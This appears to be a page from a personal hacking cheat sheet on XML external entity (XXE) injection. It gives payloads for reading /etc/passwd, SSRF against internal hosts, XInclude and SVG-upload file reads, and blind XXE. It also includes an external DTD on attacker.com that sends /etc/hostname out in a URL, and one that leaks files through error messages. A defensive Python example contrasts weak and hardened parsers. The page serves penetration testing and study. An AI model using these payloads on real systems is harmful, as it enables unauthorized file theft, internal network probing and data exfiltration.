d4Rk's 1337 h4x0r guide

XML external entity (XXE)


Last updated 2 years ago

An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser.

--

Generally, XXE vulnerabilities arise when the application's XML parser is configured to resolve external entities and/or to process XInclude.

Retrieve files

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<some><xml>&xxe;</xml></some>

SSRF

<!DOCTYPE request [ <!ENTITY xxe SYSTEM "http://internal.website.com"> ]>

XInclude

You may be able to use XInclude when you don't control the DOCTYPE element, e.g. in SOAP requests. XInclude is a separate mechanism from DTD entity resolution, so it only works if the parser has XInclude processing enabled.

<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
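
Added example (not from the original guide): the "Retrieve files" payload above parsed with Python's standard library, first with external general entities enabled (the weak configuration that makes XXE work), then with the default, and finally with a hardened expat parser that refuses DTD, entity and XInclude declarations outright, which also covers the XInclude variant. The "sensitive" file is a constructed temporary file; nothing on the real system is read.

```python
"""Weak vs. hardened XML parsing in the Python standard library (added example)."""
import io
import os
import tempfile
import xml.sax
from xml.parsers import expat
from xml.sax import handler

SAMPLE_SECRET = "constructed-secret-value"  # plays the role of /etc/hostname
XINCLUDE_NS = "http://www.w3.org/2001/XInclude"


def write_sample_file() -> str:
    """Create the throw-away file the SYSTEM entity will point at (constructed)."""
    fd, path = tempfile.mkstemp(suffix=".txt")
    with os.fdopen(fd, "w") as f:
        f.write(SAMPLE_SECRET)
    return path


def build_document(path: str) -> bytes:
    """Same structure as the 'Retrieve files' payload, aimed at the sample file."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE file [ <!ENTITY xxe SYSTEM "file://{path}"> ]>\n'
        "<some><xml>&xxe;</xml></some>"
    ).encode()


class _TextCollector(handler.ContentHandler):
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


def parse_with_sax(doc: bytes, resolve_external: bool) -> str:
    """Return the document's text; resolve_external=True is the weak setting."""
    parser = xml.sax.make_parser()
    # feature_external_ges is False by default since Python 3.7.1; turning it on
    # makes the parser fetch SYSTEM entities (file://, http://, ...) and inline them.
    parser.setFeature(handler.feature_external_ges, resolve_external)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(doc))
    return "".join(collector.parts).strip()


class UnsafeXml(ValueError):
    """Raised when a document declares a DTD, an entity, or the XInclude namespace."""


def parse_hardened(doc: bytes) -> str:
    """Expat parser that aborts as soon as a DOCTYPE, ENTITY or XInclude appears.

    Rejecting the declaration itself also stops internal-entity expansion
    (billion laughs); checking the namespace covers XInclude-based reads,
    which need no DOCTYPE at all."""
    parser = expat.ParserCreate(namespace_separator=" ")
    text = []

    def reject(*_args):
        raise UnsafeXml("DTD, entity or XInclude declarations are not accepted")

    def on_namespace(prefix, uri):
        if uri == XINCLUDE_NS:
            reject()

    parser.StartDoctypeDeclHandler = reject
    parser.EntityDeclHandler = reject
    parser.StartNamespaceDeclHandler = on_namespace
    parser.CharacterDataHandler = text.append
    parser.Parse(doc, True)
    return "".join(text).strip()


def is_rejected(doc: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_hardened(doc)
    except UnsafeXml:
        return True
    return False


def run_demo() -> tuple:
    """Run the three configurations against the same document and clean up."""
    path = write_sample_file()
    try:
        doc = build_document(path)
        leaked = parse_with_sax(doc, resolve_external=True)   # file content inlined
        default = parse_with_sax(doc, resolve_external=False)  # entity silently skipped
        rejected = is_rejected(doc)                            # refused before resolution
    finally:
        os.remove(path)
    return leaked, default, rejected


if __name__ == "__main__":
    print(run_demo())  # ('constructed-secret-value', '', True)
```

The hardened parser fails closed on the declaration rather than on the resolution step, so it does not depend on which URI schemes the resolver happens to support; for lxml the equivalent settings are `resolve_entities=False`, `no_network=True` and not calling `xinclude()`.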

File uploads

Sometimes XML-based file formats such as SVG or DOCX can be uploaded and are then parsed by the app.

<?xml version="1.0" standalone="yes"?>
<!DOCTYPE ernw [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg width="500px" height="100px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
    <text font-family="Verdana" font-size="16" x="10" y="40">&xxe;</text>
</svg>

Blind XXE

You can use out-of-band application security testing (OAST) to detect blind XXE vulnerabilities, e.g. with Burp Collaborator.

<!DOCTYPE oast [ <!ENTITY xxe SYSTEM "https://attacker.com"> ]>

Via parameter entities:

<!DOCTYPE oast [ <!ENTITY % xxe SYSTEM "https://attacker.com"> %xxe; ]>

Exfiltrate data

Create a malicious.dtd file hosted on an attacker-controlled system:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'https://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Retrieve data via error message

Create a malicious.dtd file hosted on an attacker-controlled system:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;

XXE payload on target:

<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://attacker.com/malicious.dtd"> %xxe;]>

Modified content type

Some apps accept text/xml as the content type of POST requests instead of e.g. application/x-www-form-urlencoded. If so, malicious XML can be sent to and will be processed by the app, and may be exploitable that way.

E.g.

Wikipedia
PortSwigger - Web Security Academy - XML external entity (XXE) injection
XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]